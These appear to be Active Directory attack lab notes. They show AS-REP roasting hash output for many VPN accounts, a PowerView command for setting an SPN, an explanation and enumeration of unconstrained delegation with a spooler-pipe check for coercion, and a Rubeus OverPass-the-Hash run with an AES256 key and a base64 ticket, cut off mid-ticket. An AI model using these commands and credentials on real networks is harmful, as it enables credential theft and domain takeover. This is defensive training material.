A$96466294ADEFC50E26457813E229DCFA6FF47E3E13141B0C61AB4D2FD73A3AB567D3C9AD0AC8BE
8A94AC35B92E496DF5BA472861D6F13BE2B93E51150F3E61994CBEFE465E1D63431B4CB5EEFCB25B
32465A7DB5FE9D6E14E49C9D3F6D9CAD0D3EC238E507C5282557586307A6B146675D7952DD37AD51
4417709B5B4ED061DD3530CBB2C287E34A72FEF02760BCBF79D28CC59EFEDE578478E7D94222AD60
0D23EAEA0CDC16E68E624BACF9D0348B84EA721D0DA99264842674F8A2937D6F1AE2671DD22B862B
D0C271ED4FED2D90AA7074A58451B45DB5AE840C984EE0C203BCB53D6A203BDFA6001E63DC808BD4
5770472011F8825328FEAA7C1059A378DC50AB4A141717EF9D

[*] SamAccountName : VPN167user
[*] DistinguishedName : CN=VPN167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN167user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:A0468E38EA0126EB95978D821DCE0B0
3$00DD1396BA9D8C98E9434CB463DD7D7BF2B051683688B79AF80863346B73093DAE6C8DAD4CA3EA
93BDBC0D01E5FC53685B0DAC7C793C5B812BF6C318834CE4FB6902546A2563CB9D518D8071580C5E
A5557DA7D298ABF96DFB52727E1A6EBA0319D3E11044BE4BA650C01333CFFB8F496ABC3D68176F2A
DBA28CAEB3078A05D47B2F94C8DDA34D13455240071258CC5B336644BE17C4CC43E5048BA1983141
B2F89AC18799ED97FBBA2865B5F56F90D0BDFDB6F708DBB3651A94C1EE3718497FEFCC07E4970507
40568BBC73662A74DD372CD540B77E9A9B4BEA21C614C9593407F6CBE167DE2A416EAC2903D4D847
416F676C7F327F8C6E1F8EBDC8558AD9B2C7B8EB90660E49E6

[*] SamAccountName : VPN168user
[*] DistinguishedName : CN=VPN168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN168user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:84C0E9CD6212F77B409325C39FCA397
7$D0CEA3ED0F6DD84B053366AAF4731D2C0EB63B0FDCB0FD7E812B91858ADF430C0BE5E4036D361B
D4203522A70A70610D0C70EDE95896E9B693FE1459C3EE91F8B9080046108333A3B333B19E87E1B7
0A509D7FFA0E747DAB4001A6B302DF3CD3F656BC6A9603D4976099FBA84B997B311ABA68E0017BBE
809DCBC1AE454ADBEEE7BAD19911899B54280CF695BC50680F55F786D38B36B28C6EFB52B7844249
DE45DCFE6175D62605BFDF99033E54E58F354EE710024F8BFA4F7BACCA62A0866192907584F7EEE5
77E461F7356013D76F811733ADB1450ED9A2179C60BA3BCB6CA068E1E27B96A982E5A2EF766F5CC5
B944DDD464C52D4710AF2C054ED76FB3E83A68271DD8C09E6B

[*] SamAccountName : VPN169user
[*] DistinguishedName : CN=VPN169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN169user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:C915976A8F1A0646996CE874E0E89CD
5$6C6DE01A2A23510BD11AE0BE10625987292BDFB61F69DF9283316FD7ED80A500ACECE522D672FC
3FDB2E94AED52DCF1C1E16A1DBA920169FE3FF0BE9EB2664D87FCB086BBADA730054D336217FDBC1
BD4E29D3C7E54E83671B599DB5749D018B3A4FDA887BB318F8E66231E671EA4EECEB5F0ACF54C375
AC22E7EEA347CD0194625F319AB3EE3A5230AF1B32F65B1C2544F58E7672B4F6E63C66913CE89778
8BF57BFB7531FC1F6C39A5DC86E80D9883D44AC561609A6D48CFD0297A1EAFF3A25FA16336B6FAC0
D4508F5B1A0125E00D9CE260DBD85E9F79226C9FDCDF68A18DB11F3FF2FAD23DEBF8A77851CD93EF
2E3A26E5C56B1ABCB39EC2348A939FE39D3D1E3906041ACA90

[*] SamAccountName : VPN170user
[*] DistinguishedName : CN=VPN170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN170user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:ED6B7969275D99D6429691D6F17EBE8
6$5CEBC03FC1E81B56E4E8DA8391FC4DD30B2BAB2AB17C347C44E1DC0DE41011B610A34C3CF230E1
21FFEB6B56325BCF2546312FEDC677DC258E572934C6F2750ECCA9DACD0736AE465A722C2A63B159
4942C99786E2D9E6C2AFC4C74875169F6CE42F3D67BA38166EDBE6B899A2000DEB8E2F65761D977B
D0A5226D12F57CB3E81DA4F475247F9AED46498E6A5B54C3FFDB4992CAB70CB512CB062F3CCC17EA
106FCC9F72F6E99D8539BB6E1216C385948C0297AD83AAC3D4B2E11E655E7DBA72DBC9EBC8E8D30E
209292A3EAE4C072A91FE376A2D6B893CEFCA14843C9FB6E937EC28A3BC875F02E85E1F49CE2E1CD
ED1FB26428512EBA99D83D20C6D473BC9F86D72D19128A1084

[*] SamAccountName : VPN171user
[*] DistinguishedName : CN=VPN171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN171user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:8E4805A903BFCA8C4FD9DEAB4C9DE94
5$0565FA0243DEE18C18B02DF7B3400232CF163EA8FC8BC79DA0BB4869488964A16A6CD51577115E
EE33CD780953B96395A33D1278802180EFA9A22619883ADB34B523417ACE2FFE9344C0F094425EA2
7FE38C41A0EFAF920739550DC1FF4CD288342C27BC0E2F1F93E7B2504C94BA45B295532843904521
E56385ECA232CF3C63568F392DA90AA797EC3EC05EF6471F54A1DC51E45DBE4297C5AEE2EAF90333
2500CD42B33FF263AF3306F9439DAD423D45D8276778263E3BCE8A7890DFEBB86DCCED4E5556A4E4
5750973D6914253A0A9D438926FA00830D11E5C59F3ABFEDA0CA3BA417B8586E724FE8ADB0F19A8A
1F1DFD2B0E62A50A41AB7D5330FB0257F826D6AF38C57DE616

[*] SamAccountName : VPN172user
[*] DistinguishedName : CN=VPN172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN172user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:94B5B27A2F3648D3CA03ADB76E57937
D$D7C7F643AE16A3F5747A51BEB1C1DBCF4AE4B12B43B91E9A2969A2F61A7D0405666E97AD7D6E41
6861CFCDB8AD6610D286D8667B79EA6F175F240A74BC58BE6BF184916423AEDBC4D75883455263B3
8DD6619A70EEAD57B86EEB9D09C1188DD7818813E91BC32D368A3B08B08C6F4848837BDE9C81A008
F13F6F98DD818577059E5297F64407190B66BC48554B07E51CC71C81BE4408C529343B543D893DE1
7F9F0436FE2A52F3C703A0F98375858A8F761073E238FBDAEB0548B203CD65763B7A6BF87493D953
9877F4AD0E0AD731E979864051E2BF3BF8ABC64667AC8E834DCA529D7BDEBD480F14C355DAE545CC
4CC5B20F2F903E44E0AE6480695658403F8290A9BCE6E0DA35

[*] SamAccountName : VPN173user
[*] DistinguishedName : CN=VPN173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN173user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:529BC18360C32B5422D21DFFD39F4FE
F$D93691D41F0EAE35C981B32F678A9ACB025A5F57897D0976E5E895C715617D84C077EF0562FC57
EAE3FE969DE1E8CA2B1D226245B7F02946CEFB54F106BB2048AB066A663FF52CFDA5DEA0090B188F
BD3D14F1FCF322AE6B1820915A19AD52F2F3173D99B79B92CB29288C3A66DB39D2393F3C1A1D40B7
5E500FD1682D9DC5FBE10954D12537FE6951B9AC6CCC01AEE72BDBCECF62389BBF37E96BAE08BAA8
C0BC0221EE8DA351704E77F76F18B1535CCFCA333BC43D0795CFF943D218202DA557215C19E4A712
87EEDE0FA4B887384352A59182976C02BF5DEAA88C805585CFA7B59B1A3C5B7EFA8C5EE58B7779AD
E3A12981EB59BF018C5AABDEEF22DA6D1B160B63AB11A8CAD4

[*] SamAccountName : VPN174user
[*] DistinguishedName : CN=VPN174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN174user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:4367CF1C17A240012369423CB23AA89
D$5ED349AF52178A49E95F64B50797988E1B9E95D51A7BA3695F06F4397F329FF4408A614AA2A4A7
61DA97D18EA703C91F0E4774F96018A0E8BCBDB6035D9E49B6938CE7F24D2C3BC29969545B0CB1C7
EEF0E0A84B4DB0F87F9CEA84B82E35E8E50C20E25656BBEE3D0F96D01063DC7F48E8B2E6CFF43300
3A52E4A7C3F6C3A63618A3B367FC5EA673330EF810AE114DF092F849B4A911AE563A7C8813ECA927
75C91B12DA6CF642A7285F0CB4A80B06E851B0758D5D971AA9305E7F032A1831D0508EBD2521D526
F6FA00FEE19034E668FF129DA2E5EB0CEF4AFD70257A48B0A1EFB81C9A8E695B37BBD42B51991226
4C55087E427947D4936EA1D2D9227122D68D027F04A2299C86

[*] SamAccountName : VPN175user
[*] DistinguishedName : CN=VPN175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN175user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:6A000E2F4549675BBFA42DD69FFAB7E
A$412A3DAAB6DC434FBB781F672434A1CD73E95C1FDA2F37206BD26B8B5941067A2B450140F187C0
876E0D229DAB59952BC62F114D04DDF94013E1988B1FA2B6BF1080C0013C1D0DFF7F57A6F3DD5D33
21CF170EB4335CAF2EBFFFD11FBEFFA2D490BF2A7A5CDAE9BE695E4754473B219091084AB55F49DF
B9CD03904A05B948526D2E37B7C301C466538E2891366AC3E5EE1943AAFAA288D9A69EF747CD36BE
C6CAAE11FEA80F7DDBE89BD154F352B9E204CD0ECF9FAF89E0FE0FD45A89E709F411E23D482C315C
2BB29C197A275D4A4AF2750B4186C205EBE62952DCE41B91A3D7B8CC88591A30C4927EB4AF954592
B591C9A9C1ABB1CE14FAE26C98E4F66DA703213734B8BC74E6

[*] SamAccountName : VPN176user
[*] DistinguishedName : CN=VPN176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN176user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:91A097E8A82EBBCCFDF02AA444DB6B9
D$E4C462BCF92DDE966ED965F59D2EC54B5B44D2F79274DB4A718ADF9EC270C39007AF0FB23424A0
4F0735A3EAA7C4B0EA867BADEBCDF179C70BEC94BC6B5D2E26C986A3F13E899428365153B258AD38
6CEA16B8B077F044DE4F38639DD2B988DB7C066C7AA7A35FFA730D31D1843A911024901B9D761009
2EDF673613220C5CA95E44D3C9C87E57B0EA22F65F32F2C175DA301A732766B82FE4236500131765
91ADB162967A68BA3B7627F3E02054AAAEC032385B6419BAE2ED94C50DC839D305147DB78B8644A0
20EB2121C72A3D36F8A03F20A5B4AB29F4356DE5ED25DB7643A8BE26EA7DA9E06D3FBDBFAAC3CCCA
A806310116C257C5A1DEDB116D8180EA5F2E1023E280256DBA

[*] SamAccountName : VPN177user
[*] DistinguishedName : CN=VPN177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN177user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:DD1E7E7A89DF71F40E97586D5E30C98
7$8D50E37799AE1938D66A3DD7758E31D11A97CD48EEB4D7EA1C36324CDC1421EE8C103C84C6084F
B7353FC58C5E49C36A5F620299D5D3BAB7E926CCCAF7C63BC0D911D9D19FFA6878CBA72EE000AD61
5D55C0979D8BD882D1DEB58E1E75EB0B46A71651E4DC870143A7B9B13F5082EDB7C4DB3D72A72141
4E733E3AD55BB0FEE2945EFFF2A245EDF2E66ECA3F9BDA51C61600A188B76B59794739015E0DE015
E9D90E922495515D935101CAF88767472F1606D7E1A9426E200C104D0ECF9CB71A3E7FBE78BD927F
23A1DDBFFB01042DCE0F196CB137FC8A7BA83F6D4F124D1F80487AD18FDD2272058D75B4FDDC0046
7877474F3756B54B2E1CA2FB6C68F46A8AC05CF1F412FAC2FA
[*] SamAccountName : VPN178user
[*] DistinguishedName : CN=VPN178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN178user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:30666A8BE3487467F601E950F7A5215
7$4AF5198AD80B996034A546B41893AD5AB7C83B06362F9E6C51D909845515500371A634468F304F
8B142580CEDE4AF8AAAB1465BD230F90F28DA538EBB27A143D0D7F97B6F5E029652F0A07DBC67A7E
037867D075CC6B0BE7973DC6FED4258FDE9869C5586061A78167C9FE2A342A64951CB43F70613D8C
3E71345C0716456A850B0CC09B3E827281BCD5738974F2685AB695B8CF3B43B7868125CF05C90AA5
0B4AAE814E811B9B2A75969E6D0574C391F047781FD0046F9BEBF405CF3B11BE6D0BB05577353110
E86D327767A2D3DB5E0EBBC9D39F9934AE209385A6FAD83FE6C8105945ADDAEE01F172D17B9BB95E
2E29CF158CFE97E593B9324373621EF20FF8AAD94D63B93EEA

[*] SamAccountName : VPN179user
[*] DistinguishedName : CN=VPN179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN179user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:5999783BCDBC1023B51CF37E3E753AE
5$D5B19283CED991B0B5DF61C65413841FB06283CFD575B659B303A5051CC19F4086954D5ECF92ED
428319D8B3982697F1718C38A0040F4A4089BE8B0FE1FAD60706772D7644FEA00EDE3D5822C4FA63
D9AE96F5D4B4036A93810A8BDFDEBE495D23D6C88381EBB37072DEDEE936D2C3401A96B152DD2687
4C4DA7FADB1C41974B405AB6E494F496954CB6008234FEF3CA6B9CDF3D59908443D1722BA3CF78D8
9049CADEB37EC85CA6ECB3A38F9FFD9D25993FA9C6154F57E6A58E591C029A260B7F9E95DCF35629
46D6AD967A16BF3EC25818A778411AFC1E0E0A13C01E76E92FF260CD0C97EF36968CA7ABF4218A05
FDEA6A80B72D2D22A44111ED55491DB2374C166FDE87E20DED

[*] SamAccountName : VPN180user
[*] DistinguishedName : CN=VPN180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN180user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:2C93AF6565544476188C52AFCFB1984
6$D86CBEA94C641E49971FE8A6B22F21F99EBDB3A679FFFEFBB88FAC9E04C4F13DE5735EA4533ECB
79F31DCE2D054F96EEF88D325B3C4CE29481CB4D38AECFDC26CC561A58D889A78EB2AF90A63F0C20
4BBFBCC95866A79D2B870FC2F489487B2DAF10FFE56CB0362CF3A5F51D0A7EE2A7B3305091E56C81
DE2F53671090C7506F84ABA1EF9BB92E6A3FDD2033EC7000DC758DE7C036A4E095A55766B9270A05
B5B415E920C653AAAEDEC3EEE6E6EECD6D3536725BFBCCB5A15E63973514B16FAFE9FE2458789F57
0146F67DD0975692D41099EACFCAA1E32C7879E67A3A358E48D5DDB10F87BED2FE6FB2961881E4F1
4CE3FFFD47C740279D4CF565923095C254ED453E600262B6D3

Kerberoasting - SET SPN

With enough rights over a target user (GenericAll or GenericWrite, or write access to the servicePrincipalName attribute), we can set the user's SPN to any value that is unique in the forest, request a TGS for that SPN, and kerberoast the resulting ticket. Remember to remove the SPN afterwards: it is a persistent change to the directory and an easy indicator for defenders.

Using PowerView to set the SPN (the -Set parameter takes a hashtable of attribute/value pairs):

Set-DomainObject -Identity <User> -Set @{ ServicePrincipalName = "domain/somestring" }

Kerberos Delegation

By default, a Windows machine does not forward a user's credentials on to a second machine: a service that accepted a user's Kerberos ticket cannot itself authenticate to another service as that user. This is the Kerberos "double hop" problem.

Delegation dates back to Windows 2000 Server, when Active Directory was introduced. It is a mechanism that lets a service re-use an authenticated user's Kerberos credentials to access a resource on another system, i.e. impersonate the user, and was meant to remediate the double hop problem.

Example: a web server impersonates the authenticated web application user when reading or modifying records on a back-end database server.

Types of delegation:

• Unconstrained Delegation

• Constrained Delegation

• Resource-based Constrained Delegation

Unconstrained Delegation
Unconstrained delegation allows the first-hop server to request access, on behalf of the user, to any service on any computer in the domain.

Kerberos authentication flow with Unconstrained Delegation

For our example, a user authenticates to a back-end database through a front-end web server.

Step-1: AS-REQ: The user authenticates to the DC and requests a TGT.

Step-2: AS-REP: The DC returns a signed and encrypted TGT and a session key to the user.

Step-3: TGS-REQ: The user presents the TGT to the DC and requests a TGS for the service (the web server).

Step-4: TGS-REP: The DC checks whether the account running the service is trusted for delegation. If unconstrained delegation (TRUSTED_FOR_DELEGATION in userAccountControl) is set on that account, the DC sets the ok-as-delegate flag in the service ticket. The TGS is encrypted with the service account's long-term key (its NTLM hash when RC4 is used, its AES key otherwise). The TGS and a new session key are sent to the user. Seeing ok-as-delegate, the user's Kerberos client asks the DC for a forwarded copy of its own TGT to send along with the service ticket.

Step-5: AP-REQ: The user presents the TGS to the service (the web server), which decrypts it with its own key; the forwarded TGT and its session key travel inside the AP-REQ authenticator.

Step-6: The service extracts the user's TGT and submits a new TGS request to the DC for the database service on behalf of the user (impersonating the user).

Step-7: The DC returns a TGS for the database service to the web server.

Step-8: The web server presents that TGS to the database and connects to it as the user.

Attacking Unconstrained delegation

When a user authenticates to a server with unconstrained delegation enabled, the server extracts the user's forwarded TGT from the AP-REQ and caches it in LSASS memory for later use. Anyone with local admin privileges on that server can extract the cached TGT and use it to request access to any service in the domain as that user.

Attack steps:

1. Enumerate the servers which have unconstrained delegation enabled on them (domain controllers have it by default, so they are not the interesting hits).

2. Try to compromise one of these servers.

3. Wait for, or coerce, a high-privileged principal to authenticate to this server and steal its TGT.

Enumeration
Using PowerView
PS C:\Windows\system32> Get-DomainComputer -Unconstrained

pwdlastset : 6/13/2024 9:01:43 PM
logoncount : 282
msds-generationid : {183, 46, 151, 148...}
serverreferencebl : CN=DCORP-DC,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=moneycor
p,DC=local
badpasswordtime : 5/18/2024 6:19:33 AM
useraccountcontrol : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
distinguishedname : CN=DCORP-DC,OU=Domain
Controllers,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:01:33 PM
samaccountname : DCORP-DC$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:01:33 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Standard
instancetype : 4
msdfsr-computerreferencebl : CN=DCORP-DC,CN=Topology,CN=Domain System
Volume,CN=DFSR-
GlobalSettings,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
objectguid : d698b7ab-f29e-461b-9bc9-24a4a131c92d
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/12/2022 5:59:40 AM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:01 AM}
serviceprincipalname : {ldap/dcorp-
dc.dollarcorp.moneycorp.local/DomainDnsZones.dollarcorp.moneycorp.local,
ldap/dcorp-
dc.dollarcorp.moneycorp.local/ForestDnsZones.moneycorp.local,
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dcorp-
dc.dollarcorp.moneycorp.local,
TERMSRV/DCORP-DC...}
usncreated : 12293
usnchanged : 1163850
lastlogon : 7/2/2024 10:08:57 PM
badpwdcount : 0
cn : DCORP-DC
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1000
primarygroupid : 516
iscriticalsystemobject : True
name : DCORP-DC
ridsetreferences : CN=RID Set,CN=DCORP-DC,OU=Domain
Controllers,DC=dollarcorp,DC=moneycorp,DC=local
dnshostname : dcorp-dc.dollarcorp.moneycorp.local

pwdlastset : 11/11/2022 11:20:51 PM
logoncount : 72
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:01:47 PM
samaccountname : DCORP-APPSRV$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:01:47 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Datacenter
instancetype : 4
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
objectguid : ca78344a-f7ac-4888-a371-10933b0e4b80
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/12/2022 7:20:51 AM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/15/2022 4:17:14 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {TERMSRV/DCORP-APPSRV, TERMSRV/dcorp-
appsrv.dollarcorp.moneycorp.local,
RestrictedKrbHost/DCORP-APPSRV, HOST/DCORP-APPSRV...}
usncreated : 13918
usnchanged : 1164052
lastlogon : 7/3/2024 4:11:03 AM
badpwdcount : 0
cn : DCORP-APPSRV
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1106
primarygroupid : 515
iscriticalsystemobject : False
name : DCORP-APPSRV
dnshostname : dcorp-appsrv.dollarcorp.moneycorp.local

Using AD Module
PS C:\Windows\system32> Get-ADComputer -Filter { TrustedForDelegation -eq $true }

DistinguishedName : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
DNSHostName : dcorp-dc.dollarcorp.moneycorp.local
Enabled : True
Name : DCORP-DC
ObjectClass : computer
ObjectGUID : d698b7ab-f29e-461b-9bc9-24a4a131c92d
SamAccountName : DCORP-DC$
SID : S-1-5-21-719815819-3726368948-3917688648-1000
UserPrincipalName :

DistinguishedName : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
DNSHostName : dcorp-appsrv.dollarcorp.moneycorp.local
Enabled : True
Name : DCORP-APPSRV
ObjectClass : computer
ObjectGUID : ca78344a-f7ac-4888-a371-10933b0e4b80
SamAccountName : DCORP-APPSRV$
SID : S-1-5-21-719815819-3726368948-3917688648-1106

From the output, unconstrained delegation is enabled on the machine "DCORP-APPSRV" (DCORP-DC also shows TRUSTED_FOR_DELEGATION, but domain controllers carry that flag by default). In the Lateral Movement phase, we found that the user "appadmin" has administrative privileges on "DCORP-APPSRV", and we were able to dump appadmin's credentials (the AES256 key is used below).
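Both enumeration commands above depend on a loaded module. As an added example (not from the lab notes), the same enumeration with the built-in [adsisearcher] type: it filters on the TRUSTED_FOR_DELEGATION bit directly, drops domain controllers by default because they always carry the flag, includes user objects (which can carry it too), and adds the precheck a practitioner wants before the coercion step later in this section: whether the DC exposes the spoolss named pipe. Host names follow the lab; everything else is illustrative.

```powershell
# Added example: enumerate unconstrained-delegation principals without PowerView or the AD module,
# using the built-in [adsisearcher] (System.DirectoryServices). Illustrative; not from the lab notes.

# userAccountControl bits, matched with LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803)
$TRUSTED_FOR_DELEGATION = 0x80000   # 524288
$SERVER_TRUST_ACCOUNT   = 0x2000    # 8192: domain controllers

function Get-UnconstrainedDelegation {
    param([switch]$IncludeDomainControllers)

    # DCs are TRUSTED_FOR_DELEGATION by default; they are noise, not a target.
    $dcExclude = if ($IncludeDomainControllers) { '' } else {
        "(!(userAccountControl:1.2.840.113556.1.4.803:=$SERVER_TRUST_ACCOUNT))"
    }
    # Match computer and user objects: a user account can carry the flag as well.
    $filter = "(&(|(objectCategory=computer)(objectCategory=person))" +
              "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION)$dcExclude)"

    $searcher = [adsisearcher]$filter
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange(@('samaccountname', 'dnshostname', 'useraccountcontrol', 'distinguishedname'))

    foreach ($r in $searcher.FindAll()) {
        $uac = [int]($r.Properties['useraccountcontrol'] | Select-Object -First 1)
        [pscustomobject]@{
            SamAccountName     = [string]($r.Properties['samaccountname']   | Select-Object -First 1)
            DnsHostName        = [string]($r.Properties['dnshostname']      | Select-Object -First 1)
            IsDomainController = ($uac -band $SERVER_TRUST_ACCOUNT) -ne 0
            DistinguishedName  = [string]($r.Properties['distinguishedname'] | Select-Object -First 1)
        }
    }
}

# Precondition for the printer-bug coercion: the host we want to coerce must expose the spooler pipe.
function Test-SpoolerPipe {
    param([Parameter(Mandatory)][string]$ComputerName)
    Test-Path -Path "\\$ComputerName\pipe\spoolss"
}

# Candidate landing hosts (non-DC principals trusted for unconstrained delegation).
Get-UnconstrainedDelegation | Format-Table -AutoSize

# Which DCs could be coerced into sending their TGT to one of those hosts?
$dcs = Get-UnconstrainedDelegation -IncludeDomainControllers | Where-Object IsDomainController
foreach ($dc in $dcs) {
    '{0}: spoolss pipe reachable = {1}' -f $dc.DnsHostName, (Test-SpoolerPipe -ComputerName $dc.DnsHostName)
}
```

In this lab the first table should list DCORP-APPSRV only, and the spooler check against dcorp-dc should return True; if it returns False the MS-RPRN coercion used below has no chance of working and another coercion primitive is needed.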

We now execute an OverPass-the-Hash attack with appadmin's AES256 key: Rubeus requests a TGT for appadmin and injects it into a new netonly (LOGON_TYPE 9) command prompt, so the new prompt acts as appadmin on the network while our local identity is unchanged.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1

[*] Action: Ask TGT

[*] Showing process : True
[*] Username : LV79YTVQ
[*] Domain : XCVK7KMS
[*] Password : SI56X9J5
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4316
[+] LUID : 0xe46398

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALappadmin
[*] Using aes256_cts_hmac_sha1 hash:
68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\appadmin'
[*] Target LUID : 14967704
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF+jCCBfagAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BG0wggRpoAMCARKhAwIBAqKCBFsEggRX+wUx8zuFITtrDnT0fExfxM16sYDzH/47XBbxF/HmzqxSIK91
R4NHyq3nDEl34K5agFYZDkICyUboNyO9GY9Rex+6df4cDPKvDN+4hCzyFlON73qqBqg7n47qnwqguikc
SuKArzWUyzPV6fOxCnq2G9j9pFwcVSD4GQPOkwx1IyNWJZ7XhtKmNHR7FSEjxhPBPIV6umFZWYZXhQn+
8V+Z20o1s0xq3wxt/vSXLODOeyeUfiHHBl278sDpkzTNQXNhiZzHLRZv2zSXRVJUygKqA8v+K1u+PDJA
